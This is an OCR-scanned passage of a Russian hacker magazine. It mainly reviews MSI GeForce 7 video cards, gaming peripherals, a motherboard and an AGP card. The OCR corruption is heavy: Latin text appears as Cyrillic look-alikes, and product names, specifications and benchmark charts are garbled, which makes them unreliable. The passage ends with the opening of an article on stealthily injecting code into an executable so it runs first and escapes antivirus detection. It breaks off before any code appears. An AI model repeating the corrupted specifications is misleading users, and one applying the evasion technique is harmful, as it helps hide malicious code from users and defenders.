катушку раскрутится явно не в ближайшие месяцы. Давай же посмотрим, на что способна 
линейка ІМѴІША СеРогсе 7 и так ли уж целесообразна сейчас покупка «восьмерок». 



Методика тестирования ^ 

Все видеокарты тестировались в одинаковыхусловиях. Так какуст- 
ройства в тесте были преимущественно средней и высшей ценовой 
категории, то и нагружали мы их соответственно — бенчмарками 30 
Магк версий 2005 и 2006, а также играми Ргеу, Зегіоиз 5ат 2, Р.Е.А.Р. 
и СаНо^ Зиагег. Бенчи прогонялись на стандартных настройках, игры 
— в разрешениях 1 280x1 024 и 1 600x1 200 и двух режимах: АА/АР 0^ и 
АА4х/АР 16х. Исключение составила лишь игра Саііоі 1 Зиагег — при 
использовании шейдерной модели 3.0 игра форсирует режим РЮР 
и полноэкранное сглаживание ста кими настройками попросту не 
включается. Поэтому игра прогонялась в двух разрешениях без Р5АА, 
но не стоит расстраиваться поэтому поводу — она даже так способна 
поставить на колени самую мощную видюху. 



Список оЕорцдования: 



V 



М5І ІЧХ760ОСЗ-МТ0256Е-РЮ 
М5І ІЧХ7600СТ Ріатопгі Ріиг 
М5І ГЧХ790О03-Т2С'256Е 
МЗІІЧХ79О0СТ-ѴТ20256Е 
МЗІ МХ7950СТ- ѴТ205 1 2Е-РЮ 
МЗІ МХ790О0Т0-Т205 1 2Е 
М5ІМХ79О00ТХ-Т20512Е 
МЗІМХ795О0Х2-Т2010Е 



66,1пІеіСоге 

га:Д5и5 

дтІпѴІО'А 
еі Ебіііоп) 



),5еадаіе 



/016 



ХАКЕР 05 /101/ 07 







М5І ЫХ7600С5- 
МТР256ЕНГ 

•••0000000 





М8І ЫХ7600СТ Ріатопсі РІиз 

•••0000000 



Т ехнические характеристики: 

Ядро: 673 

Количество пиксельных конвейеров, шт.: і 2 

Шина памяти., вит: і 28 

Овъем памяти, Мв: 256 

Частота ядра, МГ ц: 400 

Частота памяти , МГ ц: 400 (800) 

Тип памяти: оон2 
Выходы: РѴІ, НйМІ, З-Ѵісіео 
ѴІѴО: нет 

Это низкопрофильная плата, рассчитанная не только на 
современные игрушки (в них она как раз не особо сильна], но 
и на последние веяния в мире обработки видео. В нали- 
чии не только технология РигеѴібео, которой, в общем-то, 
оснащены все современные чипы ІЧѴЮІА, но и ЬШМІ-порт, с 
помощью которого девайс без проблем подружится с самой 
современной и навороченной ЖК-панелью. Что касается 
производительности в 30, то она не так высока, каку старших 
моделей, — сказывается невысокое количество конвейеров 
чипа и такиеже скромные частоты. Впрочем, для не слишком 
прожорливых игр плата вполне подойдет, при этом даже 
детализацию снижать, скорее всего, не придется. 

Особо продвинутые железячники могут увеличить произво- 
дительность, разогнав карточку, но на высокие достижения 
лучше не надеяться — память ничем не охлаждается, а на 
чипе установлен довольно скромный кулер. Отметим, что 
обладателям СРТ-мониторов и дешевыхЖК-панелей при- 
дется использовать идущий в комплекте переходник, так как 
разъем й-ЗиЬ на плате отсутствует. 



Т ехнические характеристики: 

Ядро: 673 

Количество пиксельных конвейеров, шт .: 1 2 

Шина памяти, вит: 128 

Овъем памяти, Мв: 256 

Частота ядра, МГ ц: 560 

Частота памяти, МГ ц: 700 (1400) 

Тип памяти: ООйВ-З 
Выходы: йѴІ, НйМІ, 5-Ѵібео 
ѴІѴО: есть 

Это еще одна обладательница новомодного НОМІ-интерфейса 
взамен привычного, но стремительно стареющего й-ЗиЬ. Отсюда 
и дополнительный двухжильный кабель, тянущийся от платы, его 
необходимо подключить ктвоей звуковухе. НЮСР — технология 
защиты Нй-контента от несанкционированного копирования 
— также поддерживается. В сравнении с М5І 14X760065- 
МТО256Е наблюдается значительный прирост производитель- 
ности, за это стоит благодарить более высокие рабочие частоты 
чипа и памяти (последняя, кстати, является представителем 
клана ОйОР-З, в отличие от В0Н2, используемой в версии 63). 
Серьезнее стало и охлаждение: широкий кулер накрывает не 
только чип, но и память, что позволяет надеяться на более-менее 
удачный оверклок. Если же лень заниматься им вручную, вполне 
можно рассчитывать на фирменную технологию М5І О.О.Т.ІІ 
Ехргезз, автоматически и притом безопасно разгоняющую плату 
до необходимого уровня. 

Сбладателям аналоговых видеокамер будет полезна функция 
ѴІѴО, благодаря которой легко можно перевести в цифру видео 
слюбого источника (все необходимые переходники в комплекте 
имеются). 




М8І ЫХ 7600Ѳ5-МТО256Е-НГО 



О 5 10 15 20 25 30 35 40 45 



> Одна из самых ресурсоемких игр на данный момент. На дешевых 
видюхах играбельность оста вляетжелать лучшего 



ЗРМагк'ОБ 



МЗШХ79500Х2-Т2О1СЗЕ 
МЗІ МХ 7900ѲТХ-Т2051 2Е 
МЗІ МХ 7900ѲТО-Т2051 2Е 
МЗІ МХ 7950ѲТ-ѴТ20512Е-ЕЮ 
МЗІ МХ 7900ѲТ-ѴТ2О256Е 
МЗШХ7900СЗ-Т20256Е 
МЗІ МХ 7600ѲТ-Оіатопі РІиз 



МЗІ МХ 7600ѲЗ-МТО256Е-ЕЮ 



О 2000 4000 6000 8000 10000 12000 14000 16000 



> Отрыв топового решения от общей массы сразу бросается в глаза 
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М8І ЫХ7900С5-Т2О256Е 

••••оооооо 

Технические характеристики: 

Ядро: 671 

Количество пиксельных конвейеров, шт.: 20 

Шина памяти, вит: 256 

Овьем памяти, Мб: 256 

Частота ядра, МГ ц: 450 

Частота памяти, МГ ц: 660 И 320) 

Т ип памяти: бРОР-3 
Выходы: 2хОѴІ, 5-Ѵібео 
ѴІѴО: нет 

Среди всех плат, собранных на чипе 671 , эта — самая «млад- 
шая». Однако серии 7600 она легко может дать фору в 
наличии полноценная 256-битная шина памяти, чип «покон- 
вейернее» и частоты повыше. Питания по шине РСІ ЕхргезвХІ 6 
этой плате уже не хватает, и тебе придется подключитьеще и 
дополнительный 6-пиновый коннектор. Плата - типичный ре- 
ференс, полностью соответствующий спецификациям ИѴЮІА: 
охлаждение, модули памяти и РСВ ничем не отличаются от 
оригинальной платы. Изменения чисто косметические - порты 
□VI, кпримеру, выкрашены вжелтый цвет. Таким оригиналь- 
ным способом производитель подчеркивает наличие под- 
держки технологии ОиаШпкОѴІ, позволяющей подключать 
и полноценно использовать мониторы со сверхвысокими раз- 
решениями ЮѴѴХ6А - 2560x1 600 точек). Результаты соответс- 
твующие — из всех плат, носящих красивый индекс 7900, эта 
показала себя наименее производительной, что, в общем-то, 
и ожидалось. Впрочем, для ценовой категории в $200 вариант 
довольно неплохой. 







ІѴІ5І ЫХ7900СТ-ѴТ2О256Е 

••••ОООООО 

Технические характеристики: 

Ядро: 671 

Количество пиксельных конвейеров, шт.: 24 

Шина памяти, вит: 256 

Овьем памяти, Мв: 256 

Частота ядра, МГц: 500 

Частот а памяти, МГ ц: 765 ( 1 530) 

Т ип памяти: еоор-з 
Выходы: 2хОѴІ. З-Ѵісіео 
ѴІѴО: есть 

Это серьезное решение для серьезных, но в меруэкономных 
любителей поиграть. Тотже чип 671 , что и в версии 65, здесь 
работает на всю катушку - в наличии все 24 пиксельных кон- 
вейера, а также более высокие частоты как самого 6Р1), так и 
памяти, бтсюда и производительность -тотже Р.Е.А.Р. вполне 
играбелен даже на высочайших настройках (хотя степень 
играбельности каждый определяет по своему). Укомплекто- 
вана плата достойно, впрочем, каки остальные решения М5І: 
вместе с платой идут игра и набор полезного софта (в том числе 
и утилита динамического разгона по технологии О.6.Т. Ехргезз). 
Кроме того, эта плата оснащена ѴІѴ6, что позволяет не только 
качественно выводить картинку на телевизор, но и не менее 
качественно захватывать ее с любого источника. Все необходи- 
мое для этого в комплектации имеется. 

Само собой, плата носит маркировку «НОТУ геабу», соот- 
ветственно, она не понаслышке знакома со сверхвысокими 
разрешениями и совместима с соответствующими мониторами 
ителевизорами. 



М5І ЫХ79500Х2-Т20КЗЕ 
МЗШХ79000ТХ-Т20512Е 
М5І ЫХ 79000ГГО-Т2051 2Е 
МЗІ І\ІХ 7950СТ-ѴТ20512Е-ЕЮ 
МЗІ ЫХ 7900ѲТ-ѴТ20256Е 
МЗІ ЫХ 7900СЗЗ-Т20256Е 
МЗІ ЫХ 7600ОТ-Оіатоп1 РІиз 
МЗІ ЫХ 7600Ѳ5-МТО256Е-І-Ю 



ЗОМагк'Об 






О 1000 2000 3000 4000 5000 6000 7000 8000 9000 




МЗШХ79500Х2-Т201ѲЕ 
МЗІ МХ 7900ѲТХ-Т20512Е 
МЗІ МХ 7900ѲТО-Т20512Е 
МЗІ ЫХ 7950ѲТ-ѴТ2051 2Е-ЕЮ 
МЗІ МХ 7900ѲТ-ѴТ20256Е 
МЗІ МХ 7900ѲЗ-Т20256Е 
МЗІ МХ 7600ѲТ-Оіатоп1 РІиз 
МЗІ МХ 7600ѲЗ-МТО256Е-НО 



Ргеу 



ш АА4хАР 16x1600x1200 
в АА 4хАР 1 6х 1 280x1 024 
н АА4хАР ОН 1200x1000 
в АА4хАР ОН 1200x1 024 



О 20 40 60 80 100 120 140 160 



> Эта игра разработана на движке Роот 3, соответственно, пре- > Большая часть плат получила от 4000 до 6000 баллов 

красно оптимизирована под все ускорители ІЧѴЮІА. 
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Технические характеристики: 

Ядро: 671 

Количество пиксельных конвейеров, шт.: 24 

Шина памяти, вит: 256 

Овъем памяти, Мв: 512 

Частота ядра, МГ ц: 550 

Частота памяти, МГ ц: 700 И 400) 

Тип памяти: боок-з 
Выходы: 2хОѴІ,5-Ѵісіео 

ѴІѴО: есть 

Все тотже чип, но немного другой индекс - 7950. Кардиналь- 
ных изменений по сравнению с 79006Т нет - увеличены объем 
памяти (до 51 2 Мб) и частоты (причем если чип работает на 
большей частоте, чем вариант ЭТ, то память, наоборот, пере- 
жила небольшой боѵѵпсіоск). Еще одно отличие заключается 

в поддержке технологии защиты от несанкционированного 

копирования НО-контента - НОСР. Выхода НОМІ на плате, 
впрочем, не предусмотрено, но эта проблема решается с помо- 
щью использования соответствующего переходника. 

Шина памяти стандартна - 256 бит. Охлаждениетакже ничем 
особым от референса не отличается - обыкновенный медный 
радиатор со смещенным влево вентилятором, охлаждающий 
и 6Р11 и память. Есть ѴІѴО, и если утебя имеется коллекция 
видеокассет, которые жалко выбросить, или записей на анало- 
говую камеру, тотеперь они точно не пропадут. Производитель- 
ность платы весьма неплоха - ее опережают разве что топовые 
модели. За цену в 300 с небольшим баксов это отличное приоб- 
ретение для любителя комфортно поиграть. 




М8І ЫХ7900СТО-Т2О51 2Е 

•••#•00000 



Т ехнические характеристики: 

Ядро: 671 

Количество пиксельных конвейеров, шт.: 24 

Шина памяти, вит: 256 

Овъем памяти, Мв: 512 

Частота ядра, МГ ц: 650 

Частота памяти, МГ ц: 660 (1320) 

Т ип памяти: ѳоор-з 
Выходы: 2хОѴІ, 5-Ѵібео 
ѴІѴО: нет 

А вот и тяжелая артиллерия, причем как в переносном, так и 
в прямом смысле — весит эта плата совсем немало! Об этом 
можно догадаться просто по ее внешнему виду — огромный 
двухслотовый кулер (вычеркиваем один близлежащий слот рас- 
ширения) с широким вентилятором в центре, двумя комплекта- 
ми алюминиевых ребер и тепловыми трубами сразу дает понять, 
что перед тобой нешуточная видюха для фильмов и детских 
игрушек. Эта плата интересна еще и тем, что выпускается она 
ограниченным тиражом и только компаниями МЗІ и Ѵ6А. По 
сути, это не что иное, как ЫѴЮІА беРогсе 79006ТХ со значи- 
тельно заниженной частотой памяти. При этом есть неплохой 
шанс вернуть плате былую силу путем разгона, правда, с одним 
«но». По памяти занижены не только частоты, но и напряжение, 
соответственно, для хорошего оверклока придется поработать 
еще и над вольтмодом, а это мы рекомендуем делать только 
очень опытным оверклокерам. Если же с паяльником ты не 
знаком, стоит дать шанс системе О.О.Т. Ехргезз. Она, конечно, 
заоблачных результатов не даст, но небольшую прибавку к РРЗ 
получить ты сможешь, причем без особыхусилий. 



Г.Е.А.В. 



МЗІ ІМХ 79500Х2-Т2010Ё 



н ДА 4хАР 16x1 600x1 200 
н АА 4хАР 1 6х 1 280x1 024 
н АА4хАР 0(1 1200x1 000 
в АА 4хАР ОН 1 200x1 024 



МЗІ ЫХ 79500Х2-Т201ѲЕ 



Зегіоиз Заѵп 2 



н АА4хАР 16x1 600x1 200 
н АА 4хАР 1 6х 1 280x1 024 
н АА 4хАР ОЙ 1 200x1 000 
н АА4хАР ОЙ 1200x1 024 



МЗІ ЫХ 79000ТХ-Т20512Е 
МЗІ ЫХ 7900ета-Т2051 2Е 
МЗІ ЫХ 7950ѲТ-ѴТ2051 2Е-РЮ 
МЗІ ЫХ 7900ѲТ-ѴТ2О256Е 
МЗІ ЫХ 7900ѲЗ-Т20256Е 




МЗІ ЫХ 7600ѲТ-Оіатоп! РІиз 



МЗІ ЫХ 7600ѲЗ-МТО256Е-НО 




О 20 40 60 80 100 120 140 160 



> Прожорливость видна сразу — даже топовая плата не может 
набрать сотню РРЗ при включенном Р5АА 



МЗІЫХ7900ѲТХ-Т2О5121 



МЗІ ЫХ 7900ѲТО-Т20512Е 



МЗІ ЫХ7950ОТ-ѴТ2ІЭ512Е+Ю 



МЗІ ЫХ 7900ѲТ-ѴТ20256Е 



МЗІ ЫХ 7900ѲЗ-Т20256Е 




МЗІ ЫХ 7600ѲТ-Оіатоп1 РІиз 



МЗІ ЫХ 7600ѲЗ-МТО256Е-НО 




О 20 40 60 80 100 120 140 160 



> На картах «низшего эшелона» с настройками лучше не перебирать 
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М8І ЫХ7900СТХ-Т2О51 2Е V 



•••••00000 

Т ехнические характеристики: 

Ядро: 671 

Количество пиксельных конвейеров, шт.: 24 

Шина памяти, вит: 256 

Овъем памяти, Мв: 512 

Частота ядра, МГ ц: 650 

Частота памяти, МГ ц: 800 ( і боо) 

Типпамяти:б 0 йР-з 




Выходы: 2хОѴІ, Б-Ѵісіео 

ѴІѴО: нет 

Эта плата — полноценный 6ТХ, без каких-либо обрезаний и 
ущемлений. Внешних отличий от версии ОТО нет вообще — все 
тотже огромный кулер со схожим дизайном, такой же набор 
выходов и РСВ как под копирку. Оно и понятно, как мы уже 
говорили, отличие между решениями только в частоте памяти 
и напряжении на ней (модули используются с идентичной ла- 
тенцией, но именноза счет разницы в напряжениях могут воз- 
никнуть проблемы с разгоном 79006ТО до уровня версии 6ТХ). 

В итоге, плата имеетзверскую производительность и почетное 
серебро в нашемтесте. В линейке «семерок» это самое мощное 
одночиповое решение! 

Функциональность платы стандартна: в наличии поддержка 
НЭТѴ, ОиаІ-І_іпк ОѴІ, фирменный авторазгон и штатная 
комплектация (хотя решение такого уровня, на наш взгляд, за- 
служивает большего). Отметим, что покупателю такого зверька 
стоит учесть еще один нюанс — питание. Плату необходимо 
обеспечить качественным блоком питания схорошим запасом 
мощности, иначе проблем в работе не избежать. 

□ Вывод 

Современные видеокарты способны вполне сносно 
справляться с любыми играми и другими видами нагрузки. 
Функционал у них примерно одинаков, и разница видна лишь в 
производительности. Поэтому все зависит только от запросов к 
скорости вывода и качеству картинки: кому-то хватит и разре- 
шения 1 024x768 со средней детализацией, а кто-то не признает 
ничего, кроме НЮ, экстремальных уровней сглаживания и ани- 
зотропии (при этом с РР8 не ниже 60). С расчетом на последних и 
был выбран обладатель награды «Выбор редакции» — им стала 
плата М8І ЫХ79500Х2-Т20КЗЕ, несущая на борту два чипа и все 
прочие радости в том же количестве. «Лучшей покупкой» мы 
признали менее дорогое и весьма функциональное решение М8І 
ІМХ7950ѲТ-ѴТ2051 2Е-НЮ, также обладающее высокой 
производительностью. И-И 




ЫХ7950СХ2-Т2О1 СЕ 

•••••00000 

Т ехнические характеристики: 

Ядро: 2x671 

Количество пиксельных конвейеров, шт.: 2 х 24 

Шина памяти, вит: 2 х 256 

Овъем памяти, Мв: 2x512 

Частота ядра, МГц: 2 х 500 

Частота памяти, МГц: 2 х 600 (1200) 

Тип памяти: еорр-з 
Выходы: 2 х ОѴІ, 5-ѴісІео 
ѴІѴО: нет 

Настоящая королева линейки «семерок»! А если быть точнее, 
то это даже не одна, а две платы, объединенные специальным 
интерфейсом в массив 5І_І. При этом слот РСІ ЕхргеззХІ 6 ис- 
пользуется всего один, а добавление еще одной такой малышки 
даст массив ОиасІ ЗІ_І — бескомпромиссный по мощности ва- 
риант, выносящий даже новомодные беРогсе 8800. На каждой 
плате расположено по 51 2 Мб памяти, а недостаток рабочих 
частот (они невысоки даже в сравнении с «младшими» платами 
линейки 7900) компенсируется режимом ЗІ_І. Немудрено, что 
решение заняло первые места во всех тестах и позволяет без 
зазрения совести задирать настройки в играх до максимума, а 
заодно и не стесняться в форсировании РЗАА и анизотропии. 
Жальтолько, что ѴІѴО отсутствует, в таком решении хотелось бы 
видеть максимум функциональности. 

За эту видюху тебе придется выложить 600 с лишним баксов! 
Если ты считаешь, что это дорого, изучи как следует графики 
— они говорят сами за себя и действуют лучше любых востор- 
женных отзывов. 




ІезМаЬ выражает благодарность за предоставленное натестирова 
ние оборудование российскому представительству компании М8І 
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ХАКЕР 05 /101/ 07 



Расстояний 
не существует 




Все для видеосвязи и интернет-телефонии 




Веб-камера Стереогарнитура 

А4Тесй РК-7МА А4ТесН Н5-60 



Клавиатура А4ТесМ КІР(5)-800 
со встроенной трубкой 



Стереогарнитура Веб-камера 
А4ТесІі Н5-7Р А4ТесИ РК-6В5М 



ѵѵ/\л/ѵѵ/.а4іесІі.іпІо 



Живите так, как вам нравится! 




Кагег РеаНіАсІсІег 



ЬодіІесН СогсІІезз КитЫерасІ 2 



Компьютерная мышь 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Отслеживаемое максимальное разрешение . точек на дюйм: 1 800 
Количество клавиш: 4 и колесо прокрутки с возможностью нажатия 
Время отклика^ мс: 1 

Максимальная скорость^ дюймов в секунду: 40 
Подсветка: есть, синий диод 
,: Рорм-фактор:для правшей 
Интерфейс: 115В 2.0 
Частота передачи ІІЗЕ_. Г ц: 1 000 




1 . Сегодня уже не составляет труда выбрать сверхчувствительную 
компьютерную мышь. Помимо Ра^ег, такие устройства предлагают еще 
І_одіІесЬ и М іеговой. Осознавая это, при разработке нового продукта 
инженеры Рагегосновное вниманиеуделили эргономическим характе- 
ристикам, отводя второй плантехническим параметрам. 

2. В плане функциональности эта мышка мало чем может похвастаться. 
Изготовитель предусмотрел, помимо основных клавиш, только две допол- 
нительных на левомторце устройства. Этот манипулятор предназначен 
исключительно для правшей, в то время как с более ранним решением 
РагегСоорегЬеасІ могли работать и право-, и леворукие. 

3. Отдельно стоит сказать о внешнем виде устройства. Дизайн чем-то на- 
поминаетуже зарекомендовавшую себя МісговоЙ НАВСІ. И неудивитель- 
но, ведь над этой мышкой также трудились инженеры из Рагег. Плавно 
пульсирующий диод синего цвета эффектно просвечивает логотип ком- 
пании на «спинке» грызуна. Подсветкой снабжено и колесо прокрутки. 

4. В комплекте с девайсом поставляется небольшой коврикидискс 
программным обеспечением. Привыкнуть к коврику можно, но некоторым 
из-за своих размеров он покажется неудобным. Прилагаемая утилита 
позволяет подстроить чувствительность и установить на каждую клавишу 
определенную команду. Междутем мышка хорошо работает и без софта. 

5. Шустро передвигаться по рабочей области мышке помогаюттефлоно- 
вые накладки натыльной стороне. Манипулятор Рагег ОеаіЬАсІсІег отлич- 
но работает на любых поверхностях, включая глянцевые. В остальном же 
это довольно простой иудобный манипулятор, хотя магазины просят за 
него немалые деньги. 




1 . Новая мышь РагегОеаіЬАсІсІег предназначена для любителей ин- 
терактивных развлечений, о чем явно говорит название. Изготовлено 
устройство на основе оптического сенсора, обеспечивающего работу с 
разрешением 1800 точекна дюйм. Однако уже есть грызуны, поддержива- 
ющие 2000 точек на дюйм. 



Геймпад с отдачей 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Тип устройства: игровой манипулятор 

Количество кнопок: 1 2 

Позиций &-Рай: 8 

Осисвоводы:4 

Мини-джойстики: 2 

Т ип подключения: беспроводной 

Интерфейс подключения: 115В 2.0 




1 . На первый взгляд дизайн беспроводного геймпада от І_одііесЬ кажется 
сильно упрощенным — все детали выполнены из черного пластика. На 
черном фоне выделяется лишь оранжевый логотип. Но через несколько 
минут понимаешь, что строгая элегантность и плавность форм йодйесЬ 
СогсІІезз РитЫерасІ 2 смотрятся оченьэффектно. 

2. Эргономика геймпада находится на очень высоком уровне: все кнопки 
под рукой и не надо вывихивать пальцы, чтобы достать до курка или боко- 
вой клавиши. Небольшой по размерам О-расІ имеет8ходовых позиций. 
Многие сложные игровые комбинации выполняются гораздо проще 
именно благодаря ему. 

3. Высокой точностью работы отличаются оба мини-джойстика. Они сде- 
ланы по одному формату, причем на поверхности, которая соприкасается 
с пальцами, проделаны небольшиеуглубления для увеличения трения. 
Таким образом, большие пальцы не соскальзывают даже при агрессив- 
ном ведении игры. 

4. Пользователю доступны два режима работы геймпада: цифровой и 
аналоговый. В цифровом режиме устройство работает как классический 
геймпад. Две оси свободы регулируются О-РасГом, а один из мини- 
джойстиков работает как переключатель вида. В аналоговом же режиме 
О-РасІ работает как переключатель вида, а джойстики регулируют степени 
свободы. 

5. Внутри корпуса предусмотрена пара электромоторов для работы 
функции обратной отдачи. Вибрационные эффекты достаточно сильно 
ощутимы и придают пикантность игровому процессу. Главное, чтобы сами 
игры поддерживали технологию Рогсе РеебЬаск. Если надоест, отключить 
работу моторов, можно, не выходя из игры, нажатием всего одной 
клавиши. 




1 . К сожалению, производитель не предусмотрел аккумуляторное пита- 
ниеустройства. Пользователю придется питать геймпад от пары обычных 
пальчиковых батареек. Тем не менее, кому-то такой подход может пока- 
заться совсем не недостатком. 








Функциональная платформа на основе мощного чипсета 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Поддерживаемые процессоры: Іпіеі Репііит 4, ІпТеІ Репііит В, ІпіеІСоге 2 
Рио, ІпІеІСоге ОиасІ, I пѣеі Сеіегоп-Р 
Разъем: ЮА775 

Чипсет: ЫѴЮІА пРогсе 650і 5І_І (ЫѴЮІА С55 (ЫВ) + ЫѴЮІА МСР51 (5В)) 
Память:45йПАМ йІММ порта с поддержкой до 8 Гб памяти 00Р2- 
400/533/667/800 

Слоты расширения: 2 х РСІ Ехргезз хі 6, 2 х РСІ Ехргезз хі , 3 х РСІ 2.2 
Хранение данных: 2 порта РАТА 133/100/66/33 с возможностью подключе- 
ния 2-х винчестеров типа ЮЕ, 1 х ЕОй (Ріорру), 4 х БАТА, 1 х е-5АТА 
Звук:8-канальный аудиокодек РеаІТек АЮ888 НідН РеЯпШоп Аисііо 
Сеть: 2 х бідаЬіі ЕАЫ (контроллер Реаііек РТЕ821 1 ВЦ 
Дополнительно: 1 0 115В 2.0 портов (4 внешних + 6 внутренних), 1 х Еігеѵѵіге 
(опционально) 

Торм-фактор: ста н да ртн ы й АТХ 

Размеры, мм: 305x244 



1 . Плата из серии игровых платформ от М5І рассчитана на работу с 
процессорами Іпіеі под сокет ЕѲА775. Предусмотрено вседля комфортной 
работы: порты Еігеѵѵіге, е-5АТА, а также коаксиальный ЭРОІР-ОиГ 

2. Устройство построено на базе набора логики ЫѴЮІА пЕогсе 650і 5І_І, 
а значит, 2 порта РСІ Ехргезз хі 6 могут работать в 511-режиме, при этом 
каждый будет использовать 8 линий в процессе дуальной работы. 

3. Окружающие процессорный сокетэлементы не будут мешатьустановке 
габаритного кулера. Проблемы могут возникнуть лишь из-за радиатора в 
схеме питания, если говорить о широких моделях. Отметим также, что при 
сборке были использованы долговечные конденсаторы. 

4. Охлаждением занимается конструкция из трех радиаторов и парытеп- 
ловыхтрубок. Работает эта схема достаточно эффективно — температура 
северного моста при тестировании не превысила 41 градуса при нагрузке. 



ТЕХНИЧЕСКІЕ ХАРАКТЕРИСТИКИ: 

Г рафический процессор: РѴ570 
Частота процессора , МГ ц: 500 
Частота памяти, МГ ц: 1 200 
Тип памяти: 60 ОРЗ 
Шина памяти, вит: 256 
Максимальное разрешение: 2560x1 600 
Выходы: ОѴІ, 6-51ІВ, ТѴ-Оиі 
Интерфейс: АО Р 8х 



1 . Для тех, кому жалко выкидывать свой старый компьютер без РСІ 
Ехргезз компания РаЮ выпускает графические платы с поддержкой АѲР 
Одна из них — Ра ІИ; РабеопХ19506Т5ирегА6Р. 

2. И текстолит, и устройство охлаждения выполнены в едином цветовом 
решении. Красная плата выглядиточень эффектно. Однако стоит отме- 
тить, что Раііі РабеопХ19506Т5ирегА6Р — это двухслотовый вариант. 
Поэтому следует позаботиться о наличии свободного места в корпусе 
системы, чтобы не было проблем сустановкой. 

3. Инженеры компании Ра ІИ: использовали свой собственный РОВ при 
проектировании устройства. При этом были сохранены рекомендованные 
АТІ/АМ О-частоты: для процессора — 500 МГц, а для памяти — 1200 МГц. 
Общий объем видеопамяти равен 512 Мб и составлен из восьми микро- 
схем ООРЗ от компании Оітопба (бывшее подразделение Іпііпеоп). 

4. Охладителей на платедва. Первый, основной, соприкасается исклю- 
чительно с графическим процессором, оставляя памятьбез охлаждения. 
Это круглый алюминиевый радиатор, который обдувает вертушка в 
пластиковом кожухе. Второй охладитель — это радиатор, установленный 
на АОР-контроллере. Греется он достаточно сильно. 
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1. Из неудобств можно выделить только неудачное расположение восьми- 
контактного разъема питания. Также расстраивает наличие всего четырех 
разъемов 5АТА на плате — домашний сервер собрать будет проблематично. 

ТЕСТОВЫЙ СТЕНД: Процессор: Ыеі Сеге 2 Оио Е6700. Кулер: Ыеі ВОХ. 
Оперативная память, Мв: 2 х 51 2, Кіпдв^оп 00Р2-900. Видеокарта: 
АЗІУЗ ЕАХ1 900ХТХ . Винчестер., Г в: ЗО, Зеада^е Ваггаси сіа 7200грт. 
Блок питания, Вт: 450, Гіов^оп. 

РЕЗУЛЬТАТЫ ТЕСТИРОВАНИЯ: 30 Магк 2006: 2079. 30 Магк 2005: 4975. 
НаІТ-иТе 2, 1 024x768: 35 РР5. Запйга 2007 Агі*Мте*іс ОЬугв*опе: 71 01 
Маг кв. Зирег РІ, 2М, сек: 1 03,1 2. ѴіпРАР 3.5 , МиІШНгеа *евНпд, Кв/сек: 
333. 



1. ЕР5 в играх могло бы быть и побольше. Если ты заядлый геймер, то 
тебе все-таки надо идти в ногу с прогрессом и обзавестись платформой с 
поддержкой РСІ Ехргезз. 

ТЕСТОВЫЙ СТЕНД: Процессорам ОАіЫоп Х2 5000+, АМ2. Материнская 
плата: АЭРоск АМ2ЫЕЗ Ѵ5ТА. Оперативная память, Мв: 2x512, Кіпдзіюп 
ООР2-900. 

РЕЗУЛЬТАТЫ ТЕСТИРОВАНИЯ: 30 Магк 2006: 2865. 30 Магк 2005: 5121. 
НаІГ-иГе 2, 1 024x763: 74 ЕР5. Оиаке 4, 1 024x763, 4хАА, 1 6хАЕ: 32 .Ргеу, 
1 024x763, 4хАА, 1 6хАР: 65. Р.Е.А.Р., 1 024x763, 4хАА, 1 6хАГ:39. 






[ІезЫаЬ выражает благодарность за предоставленное на тестирование оборудование российским представительствам компаний М5І, | 
■ЕоаіІесЬ, Раііі; и РагегІ 



/ 023 











КРИС КАСПЕРСКИ АКА МЫЩЪ 



Суперклей 
от «Хакера 



ххххххххххххххххххххххххххх 

НОВЫЙ СПОСОБ СКЛЕИТЬ ДВА ИСПОЛНЯЕМЫХ ФАЙЛА 

В хакерской практике достаточно часто возникает пот- 
ребность внедрить в готовый ехе-файл свой код (необяза- 
тельно вредоносный) так, чтобы он получал управление 
первым, не вызывал ругательств со стороны антивирусов 
и вообще по возможности вел себя максимально скрыт- 
но, не бросаясь в глаза. Как это сделать? Мы знаем как 
и сейчас обстоятельно тебе это объясним. 



уществует целое семейство утилит, 
предназначенных для склейки 
нескольких программ в один файл, 
с общим названием «джойеры» (от 
английского «ріпег» — «соединитель»): Эоіпег 
Ьу Віасіе, Эирегбіие, МісгоЭоіпег, Эипіасіог и 
множество других. Их подробный обзор можно 
отрыть в статье «Клейкий софт» («Хакер», №65, 
ѵѵѵѵѵѵ.хакер.ги/тада2Іпе/ха/065/044/1 .азр ). 
Однако качество склейки оставляет желать 
лучшего. Большинство джойнеров просто по- 
мещают внедряемый файл в оверлей основного 
ехе-файла и при запуске копируютего на диск 
во временную папку или, еще чаще, в систем- 
ный каталогѴѴІпсіоѵѵБ, прав записи в который 
у простого пользователя, не сидящего под 
администратором, разумеется, нет, и операция 
накрывается меднымтазом. В любом случае 
копированиезанимает какое-то время, замед- 
ляя загрузку программ, что рождает в голове 
пользователя смутные подозрения. 

Более совершенные джойнеры работают по 
принципу упаковщиков исполняемых файлов и 
проецируют внедренный ехе непосредственно 
в оперативную память, что не только ускоряет 
загрузку, но и, сточки зрения РЕ-формата, 
выглядит намного более политкорректно («чест- 
ный» РЕ-файл с оверлеем — это редкость). 
Однако все джойнеры без исключения рано 



или поздно попадают в антивирусные базы, 
поскольку представляют собой готовые утилиты, 
в которых легко выделить постоянную сигнатуру 
(даже если они выполнены на полиморфной 
основе). 

Правильные хакеры таксебя не ведут и склеива- 
ют программы самостоятельно. И это совсем 
нетрудно! Нужны лишь верный друг Ьіеѵѵ и 
минимальные навыки программирования на Си. 
Но прежде чем брать быка за рога, сделаем одно 
важноеуточнение. Внедряемый код не обяза- 
тельнодолжен быть вирусом, червем, руткитом 
или любой другой вредоносной заразой, поэ- 
тому, во избежание недоразумений, условимся 
называть егоХ-кодом. 

Примеры исполняемых файлов, прилагаемые 
кэтой статье, совершенно безвредные и могут 
запускаться без опаски какс правами адми- 
нистратора, так и без таковых. Хорошая идея 
— прогнать их через все имеющиеся антивиру- 
сы и пронаблюдатьза их реакцией. 

□ Как мы будем действовать 

Всякий ехе-файл импортирует одну или 
несколько динамических библиотек (Оупатіс 
Ыпк ЫЬгагу, или сокращенно ОЩ, прописанных 
в таблице импорта. При запуске ехе-файла, 
системный загрузчик а нал изируеттабл и цу 
импорта, загружает все перечисленные в ней 



динамические библиотеки, вызывая функцию 
БИМаіп для инициализации каждой БИ, и 
только после этого передаетуправление на ори- 
